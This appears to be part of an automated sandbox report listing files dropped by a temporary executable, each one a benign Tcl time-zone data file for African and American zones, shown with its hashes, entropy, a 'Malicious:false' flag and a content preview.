                                                                                                                                                                                                                                                                                                                                SHA-512:A71CCB957FB5102D493320F48C94ADB642CCAA5F7F28BDDE05D1BB175C29BCBAC4D19DBC481AC0C80CE48F8E3840746C126CBC9CE511CA48D4E53DE22B3D66E7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Johannesburg)]} {. LoadTimeZoneFile Africa/Johannesburg.}.set TZData(:Africa/Maseru) $TZData(:Africa/Johannesburg).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):195
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.911369740193625
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7HbsvFVAIgNTzbDJL2DzjEHp4DWbBn:MBaIMaHw4NHnJL2DzjEJ4DWt
                                                                                                                                                                                                                                                                                                                                MD5:8F4C02CE326FAEEBD926F94B693BFF9E
                                                                                                                                                                                                                                                                                                                                SHA1:9E8ABB12E4CFE341F24F5B050C75DDE3D8D0CB53
                                                                                                                                                                                                                                                                                                                                SHA-256:029AD8C75A779AED71FD233263643DADE6DF878530C47CF140FC8B7755DDA616
                                                                                                                                                                                                                                                                                                                                SHA-512:4B7D2D1D8DA876ABCD1E44FD5E4C992287F2B62B7C7BC3D6FD353E6312053F6762DBD11C0F27056EF8E37C8A2AF8E5111CF09D4EB6BB32EC1FF77F4C0C37917B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Johannesburg)]} {. LoadTimeZoneFile Africa/Johannesburg.}.set TZData(:Africa/Mbabane) $TZData(:Africa/Johannesburg).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):182
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.828470940863702
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt2DcBEBXCEeDcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL2DFSVDkr
                                                                                                                                                                                                                                                                                                                                MD5:B686E9408AB6EC58F3301D954A068C7E
                                                                                                                                                                                                                                                                                                                                SHA1:C1259C31F93EB776F0F401920F076F162F3FFB2D
                                                                                                                                                                                                                                                                                                                                SHA-256:79DB89294DAE09C215B9F71C61906E49AFAA5F5F27B4BC5B065992A45B2C183D
                                                                                                                                                                                                                                                                                                                                SHA-512:CF96C687D33E68EB498A63EC262FC968858504410F670C6F492532F7C22F507BEACD41888B0A7527C30974DC545CCA9C015898E2D7C0C6D14C14C88F8BBED5C5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Mogadishu) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):200
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.81604007062907
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52D3NwTm2OHrFGxYPlHIgafTwG5B:MBp52D3NwTmdHhmYPdIgar5B
                                                                                                                                                                                                                                                                                                                                MD5:8F9D1916FF86E2F8C5C9D4ABCC405D53
                                                                                                                                                                                                                                                                                                                                SHA1:286BFEC8F7CE6729F84FD6CFEE6A40B7277A4DFF
                                                                                                                                                                                                                                                                                                                                SHA-256:182F2608422FF14C53DC8AC1EDFFE054AE011275C1B5C2423E286AD95910F44C
                                                                                                                                                                                                                                                                                                                                SHA-512:7EEF6840E54313EF1127694F550986BF97BB1C8BD51DED0AB6D5842B74B5BF0406C65B293F1106E69DDFA0B01AD46756492DEDD9ECCBD077BB75FDA95A9E1912
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Monrovia) {. {-9223372036854775808 -2588 0 LMT}. {-2776979812 -2588 0 MMT}. {-1604359012 -2670 0 MMT}. {63593070 0 0 GMT}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):235
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.70181156382821
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52DkWJm2OHsvT5X26V/7VVpVCgekKB9TQ4U/w:MBp52DdJmdHsvVXHVVnmQ4U/w
                                                                                                                                                                                                                                                                                                                                MD5:B6562D5A53E05FAAD80671C88A9E01D3
                                                                                                                                                                                                                                                                                                                                SHA1:0014B14CFDDE47E603962935F8297C4C46533084
                                                                                                                                                                                                                                                                                                                                SHA-256:726980DCC13E0596094E01B8377E17029A2FCCE6FE93538C61E61BA620DD0971
                                                                                                                                                                                                                                                                                                                                SHA-512:D9C2838C89B0537C7F7A7319600D69D09AC004BD72358B452425A3B4861140246F71A94F004C2EF739620E81062F37ED9DA6D518F74956630006DD5674925A63
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Nairobi) {. {-9223372036854775808 8836 0 LMT}. {-1309746436 10800 0 EAT}. {-1262314800 9000 0 +0230}. {-946780200 9900 0 +0245}. {-315629100 10800 0 EAT}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):200
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8064239600480985
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52DjXm2OHNseVaxCXGFaS1HkFWTvLn:MBp52DjXmdHPVX8aS2yzn
                                                                                                                                                                                                                                                                                                                                MD5:459DA3ECBE5C32019D1130DDEAB10BAA
                                                                                                                                                                                                                                                                                                                                SHA1:DD1F6653A7B7B091A57EC59E271197CEC1892594
                                                                                                                                                                                                                                                                                                                                SHA-256:F36F8581755E1B40084442C43C60CC904C908285C4D719708F2CF1EADB778E2E
                                                                                                                                                                                                                                                                                                                                SHA-512:FF74D540157DE358E657E968C9C040B8FE5C806D22782D878575BFAC68779303E6071DC84D6773BC06D299AC971B0EB6B38CA50439161574B5A50FF6F1704046
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Ndjamena) {. {-9223372036854775808 3612 0 LMT}. {-1830387612 3600 0 WAT}. {308703600 7200 1 WAST}. {321314400 3600 0 WAT}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):173
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.822255424633636
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2DcdhA9Ff2DcGev:SlSWB9IZaM3y7V4FVAIgNT9L2Dsh2f2e
                                                                                                                                                                                                                                                                                                                                MD5:3142A6EAC3F36C872E7C32F8AF43A0F8
                                                                                                                                                                                                                                                                                                                                SHA1:0EACF849944A55D4AB8198DDD0D3C5494D1986DA
                                                                                                                                                                                                                                                                                                                                SHA-256:1704A1A82212E6DB71DA54E799D81EFA3279CD53A6BFA980625EE11126603B4C
                                                                                                                                                                                                                                                                                                                                SHA-512:BB3DADC393D0CF87934629BBFAFAD3AD9149B80843FC5447670812357CC4DFBCAF71F7104EBF743C06517BB42111B0DB9028B22F401A50E17085431C9200DAB2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Niamey) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):183
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.862257004762335
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2DcboGb+DcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2Dqbb+V
                                                                                                                                                                                                                                                                                                                                MD5:6849FA8FFC1228286B08CE0950FEB4DD
                                                                                                                                                                                                                                                                                                                                SHA1:7F8E8069BA31E2E549566011053DA01DEC5444E9
                                                                                                                                                                                                                                                                                                                                SHA-256:2071F744BC880E61B653E2D84CED96D0AD2485691DDE9FFD38D3063B91E4F41F
                                                                                                                                                                                                                                                                                                                                SHA-512:30211297C2D8255D4B5195E9781931861A4DF55C431FFC6F83FE9C00A0089ED56179C07D33B1376C5DE8C0A9ABF2CFE473EF32AD14239DFD9599EA66BC286556
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Nouakchott) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):184
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.872638989714255
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2DcXCZDcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2D1DBP
                                                                                                                                                                                                                                                                                                                                MD5:7FF39BAAF47859EE3CD60F3E2C6DFC7D
                                                                                                                                                                                                                                                                                                                                SHA1:5CFC8B14222554156985031C7E9507CE3311F371
                                                                                                                                                                                                                                                                                                                                SHA-256:47E40BDBAC36CDB847C2E533B9D58D09FE1DBA2BED49C49BC75DD9086A63C6EB
                                                                                                                                                                                                                                                                                                                                SHA-512:DEEA0982593AE7757E70BD2E933B20B65CD9613891DC734AA4E6EC14D12AD119D2C69BA38E6FA4AE836C6CE14E57F35AE7F53345ACA4CF70AD67680E49BC6B7C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Ouagadougou) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):177
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.845403930433216
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2DcyTKM0DcGev:SlSWB9IZaM3y7V4FVAIgNT9L2DQD4v
                                                                                                                                                                                                                                                                                                                                MD5:9A4C8187E8AC86B1CF4177702A2D933A
                                                                                                                                                                                                                                                                                                                                SHA1:6B54BBBE6D7ABC780EE11922F3AC50CDE3740A1F
                                                                                                                                                                                                                                                                                                                                SHA-256:6292CC41FE34D465E3F38552BDE22F456E16ABCBAC0E0B813AE7566DF3725E83
                                                                                                                                                                                                                                                                                                                                SHA-512:8008DB5E6F4F8144456021BB6B112B24ADB1194B1D544BBCB3E101E0684B63F4673F06A264C651A4BC0296CB81F7B4D73D47EAC7E1EC98468908E8B0086B2DDD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Porto-Novo) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):200
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8463501042309645
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52DcOFwFkXGm2OHzT5vXbeaFnvUdSa5FF1IEvWZvZYvCn:SlSWB9X52DIJm2OHH5PzdVacbLn
                                                                                                                                                                                                                                                                                                                                MD5:D28C0D0628DE3E5D9662A3376B20D5B4
                                                                                                                                                                                                                                                                                                                                SHA1:464351F257655F10732CA9A1E59CF6587B33F8A1
                                                                                                                                                                                                                                                                                                                                SHA-256:B9F317EAA504A195BD658BA7EE9EE22D816BF46A1FFDB8D8DA573D311A5FF78A
                                                                                                                                                                                                                                                                                                                                SHA-512:B056E7A16CE8E5CC420F88AF26E893348117306D66ED2DF4C6A6C2CA9F48783714E08AACF94BC646A1B4A2B3FB2080A4E53EDF4633C9AE259BBBA3F8ABE4DEE3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Sao_Tome) {. {-9223372036854775808 1616 0 LMT}. {-2713912016 -2205 0 LMT}. {-1830384000 0 0 GMT}. {1514768400 3600 0 WAT}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):181
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.85737401659099
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2DcHdDcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2DwdDBP
                                                                                                                                                                                                                                                                                                                                MD5:AF295B9595965712D77952D692F02C6B
                                                                                                                                                                                                                                                                                                                                SHA1:BC6737BD9BFD52FE538376A1441C59FB4FC1A038
                                                                                                                                                                                                                                                                                                                                SHA-256:13A06D69AEB38D7A2D35DF3802CEE1A6E15FA1F5A6648328A9584DD55D11E58C
                                                                                                                                                                                                                                                                                                                                SHA-512:E47C5EA2DFBC22CF9EAC865F67D01F5593D3CDDB51FDE24CDD13C8957B70F50111675D8E94CA859EC9B6FAA109B3EFA522C3985A69FE5334156FEE66B607006E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Timbuktu) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):920
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.074538534246205
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52D0mdHrjWC+fGZni8hRSUNvoTC3yJ/Z9vPdq8UwLVFoBZdEthEK7st5kS1R:cQIevhR5FNgTbJ3b3D0WeXR
                                                                                                                                                                                                                                                                                                                                MD5:A53F5CD6FE7C2BDD8091E38F26EEA4D1
                                                                                                                                                                                                                                                                                                                                SHA1:90FB5EE343FCC78173F88CA59B35126CC8C07447
                                                                                                                                                                                                                                                                                                                                SHA-256:D2FCC1AD3BFE20954795F2CDFFFE96B483E1A82640B79ADAA6062B96D143E3C7
                                                                                                                                                                                                                                                                                                                                SHA-512:965E42972994AE79C9144323F87C904F393BA0CDF75186C346DA77CFAA1A2868C68AF8F2F1D63D5F06C5D1D4B96BA724DD4BC0DF7F5C4BD77E379AA674AE12DA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Tripoli) {. {-9223372036854775808 3164 0 LMT}. {-1577926364 3600 0 CET}. {-574902000 7200 1 CEST}. {-512175600 7200 1 CEST}. {-449888400 7200 1 CEST}. {-347158800 7200 0 EET}. {378684000 3600 0 CET}. {386463600 7200 1 CEST}. {402271200 3600 0 CET}. {417999600 7200 1 CEST}. {433807200 3600 0 CET}. {449622000 7200 1 CEST}. {465429600 3600 0 CET}. {481590000 7200 1 CEST}. {496965600 3600 0 CET}. {512953200 7200 1 CEST}. {528674400 3600 0 CET}. {544230000 7200 1 CEST}. {560037600 3600 0 CET}. {575852400 7200 1 CEST}. {591660000 3600 0 CET}. {607388400 7200 1 CEST}. {623196000 3600 0 CET}. {641775600 7200 0 EET}. {844034400 3600 0 CET}. {860108400 7200 1 CEST}. {875919600 7200 0 EET}. {1352505600 3600 0 CET}. {1364515200 7200 1 CEST}. {1382662800 7200 0 EET}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1072
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.074604685883076
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52DgmdHjPbwSRjneMVyDKCNFWLFyBXS9/3S3K/CBmvyncSuZSqLS2C6oPwVFD:cQUejbwSRyS2Uyc+FcJLKgzmcx9b
                                                                                                                                                                                                                                                                                                                                MD5:1899EDCB30CDDE3A13FB87C026CD5D87
                                                                                                                                                                                                                                                                                                                                SHA1:4C7E25A36E0A62F3678BCD720FCB8911547BAC8D
                                                                                                                                                                                                                                                                                                                                SHA-256:F0E01AA40BB39FE64A2EB2372E0E053D59AA65D64496792147FEFBAB476C4EC3
                                                                                                                                                                                                                                                                                                                                SHA-512:FD22A2A7F9F8B66396152E27872CCBA6DA967F279BAF21BC91EF76E86B59505B3C21D198032B853427D9FFAB394FBB570F849B257D6F6821916C9AB29E7C37A1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Tunis) {. {-9223372036854775808 2444 0 LMT}. {-2797202444 561 0 PMT}. {-1855958961 3600 0 CET}. {-969242400 7200 1 CEST}. {-950493600 3600 0 CET}. {-941940000 7200 1 CEST}. {-891136800 3600 0 CET}. {-877827600 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-842918400 3600 0 CET}. {-842223600 7200 1 CEST}. {-828230400 3600 0 CET}. {-812502000 7200 1 CEST}. {-796269600 3600 0 CET}. {-781052400 7200 1 CEST}. {-766634400 3600 0 CET}. {231202800 7200 1 CEST}. {243903600 3600 0 CET}. {262825200 7200 1 CEST}. {276044400 3600 0 CET}. {581122800 7200 1 CEST}. {591145200 3600 0 CET}. {606870000 7200 1 CEST}. {622594800 3600 0 CET}. {641516400 7200 1 CEST}. {654649200 3600 0 CET}. {1114902000 7200 1 CEST}. {1128038400 3600 0 CET}. {1143334800 7200 1 CEST}. {1162083600 3600 0 CET}. {1174784400 7200 1 CEST}. {1193533200
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1591
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.915421470240155
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5qtCmcMxTFD9nJivm/8ySy/tnwfn8OIxJJSV1AnNlKQmX0UTjJx2MgXgprKfks1/:QCj6tXww023zn/
                                                                                                                                                                                                                                                                                                                                MD5:18BD78EB14E153DAAAAE70B0A6A2510C
                                                                                                                                                                                                                                                                                                                                SHA1:A91BA216A2AB62B138B1F0247D75FBA14A5F05C0
                                                                                                                                                                                                                                                                                                                                SHA-256:639A57650A4EA5B866EAAA2EEC0562233DC92CF9D6955AC387AD954391B850B1
                                                                                                                                                                                                                                                                                                                                SHA-512:88F34732F843E95F2A2AD4FAA0B5F945DD69B65FDDB4BB7DD957B95283B7AE995F52050B45A6332864C1C5CC4611390F6827D82569D343B5E1B9DDFE0AE5A633
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Windhoek) {. {-9223372036854775808 4104 0 LMT}. {-2458170504 5400 0 +0130}. {-2109288600 7200 0 SAST}. {-860976000 10800 1 SAST}. {-845254800 7200 0 SAST}. {637970400 7200 0 CAT}. {764200800 3600 1 WAT}. {778640400 7200 0 CAT}. {796780800 3600 1 WAT}. {810090000 7200 0 CAT}. {828835200 3600 1 WAT}. {841539600 7200 0 CAT}. {860284800 3600 1 WAT}. {873594000 7200 0 CAT}. {891734400 3600 1 WAT}. {905043600 7200 0 CAT}. {923184000 3600 1 WAT}. {936493200 7200 0 CAT}. {954633600 3600 1 WAT}. {967942800 7200 0 CAT}. {986083200 3600 1 WAT}. {999392400 7200 0 CAT}. {1018137600 3600 1 WAT}. {1030842000 7200 0 CAT}. {1049587200 3600 1 WAT}. {1062896400 7200 0 CAT}. {1081036800 3600 1 WAT}. {1094346000 7200 0 CAT}. {1112486400 3600 1 WAT}. {1125795600 7200 0 CAT}. {1143936000 3600 1 WAT}. {1157245200 7200 0 CAT}. {1175385600 3600 1 WAT}
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8171
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.783938143940452
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:DGWQm82ctfc/TVu7pAmKABmAlJD1NPaTsrEe50IC:DGWQm67pAmKABmiD1R2sG
                                                                                                                                                                                                                                                                                                                                MD5:DD838D2C8CF84B775BBCBA7868E7FFB5
                                                                                                                                                                                                                                                                                                                                SHA1:509CFC15E2CBFC2F183B4A3CDEC42C8427EBA825
                                                                                                                                                                                                                                                                                                                                SHA-256:01A88ADE038DDD264B74ED921441642CAA93830CEF9594F70188CCF6D19C4664
                                                                                                                                                                                                                                                                                                                                SHA-512:9D520CADC0134E7812B5643311246CED011A22D50240A03260478C90B69EC325AE5BD7548BA266E00253AC3288605A912C5DBB026EA1516CB2030F302BFCDF0E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Adak) {. {-9223372036854775808 44002 0 LMT}. {-3225223727 -42398 0 LMT}. {-2188944802 -39600 0 NST}. {-883573200 -39600 0 NST}. {-880196400 -36000 1 NWT}. {-769395600 -36000 1 NPT}. {-765374400 -39600 0 NST}. {-757342800 -39600 0 NST}. {-86878800 -39600 0 BST}. {-31496400 -39600 0 BST}. {-21466800 -36000 1 BDT}. {-5745600 -39600 0 BST}. {9982800 -36000 1 BDT}. {25704000 -39600 0 BST}. {41432400 -36000 1 BDT}. {57758400 -39600 0 BST}. {73486800 -36000 1 BDT}. {89208000 -39600 0 BST}. {104936400 -36000 1 BDT}. {120657600 -39600 0 BST}. {126709200 -36000 1 BDT}. {152107200 -39600 0 BST}. {162392400 -36000 1 BDT}. {183556800 -39600 0 BST}. {199285200 -36000 1 BDT}. {215611200 -39600 0 BST}. {230734800 -36000 1 BDT}. {247060800 -39600 0 BST}. {262789200 -36000 1 BDT}. {278510400 -39600 0 BST}. {294238800 -36000 1 BDT}. {309960000 -3
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8410
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.882284820226162
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:RWFxXw34N+YXSUKC8aaIqDPRs/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:Rsd6M/4h5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                                                                                                MD5:30468928CFDD0B6AAC8EA5BF84956E21
                                                                                                                                                                                                                                                                                                                                SHA1:0B146D4D789CD49F0A7FEDFFE85FFD31C0926D9C
                                                                                                                                                                                                                                                                                                                                SHA-256:202A45DEBFD6E92EF21E2FFF37281C1DE5B4AF4C79DC59A642013EBB37FE5AF0
                                                                                                                                                                                                                                                                                                                                SHA-512:721049A2C751BC3F90B0D757C85F59971B46C70942B2F8A20B0E0E0834B89BBE9A5F16D20AEB5F58C1B6268D71DD5F39F9135C60FDE692E3E472598E054C1D96
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Anchorage) {. {-9223372036854775808 50424 0 LMT}. {-3225223727 -35976 0 LMT}. {-2188951224 -36000 0 AST}. {-883576800 -36000 0 AST}. {-880200000 -32400 1 AWT}. {-769395600 -32400 1 APT}. {-765378000 -36000 0 AST}. {-86882400 -36000 0 AHST}. {-31500000 -36000 0 AHST}. {-21470400 -32400 1 AHDT}. {-5749200 -36000 0 AHST}. {9979200 -32400 1 AHDT}. {25700400 -36000 0 AHST}. {41428800 -32400 1 AHDT}. {57754800 -36000 0 AHST}. {73483200 -32400 1 AHDT}. {89204400 -36000 0 AHST}. {104932800 -32400 1 AHDT}. {120654000 -36000 0 AHST}. {126705600 -32400 1 AHDT}. {152103600 -36000 0 AHST}. {162388800 -32400 1 AHDT}. {183553200 -36000 0 AHST}. {199281600 -32400 1 AHDT}. {215607600 -36000 0 AHST}. {230731200 -32400 1 AHDT}. {247057200 -36000 0 AHST}. {262785600 -32400 1 AHDT}. {278506800 -36000 0 AHST}. {294235200 -32400 1 AHDT}. {309956400 -360
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):203
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.9101657646476164
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290/8J5290e/:MBaIMY9QpI290/8m90O
                                                                                                                                                                                                                                                                                                                                MD5:F7D915076ABE4FF032E13F8769D38433
                                                                                                                                                                                                                                                                                                                                SHA1:F930A8943E87105EE8523F640EA6F65BD4C9CE78
                                                                                                                                                                                                                                                                                                                                SHA-256:9D368458140F29D95CAB9B5D0259DE27B52B1F2E987B4FA1C12F287082F4FE56
                                                                                                                                                                                                                                                                                                                                SHA-512:63C99FFA65F749B7637D0DF5A73A21AC34DFEAD364479DE992E215258A82B9C15AB0D45AAF29BD2F259766346FDB901412413DD44C5D45BB8DF6B582C34F48B3
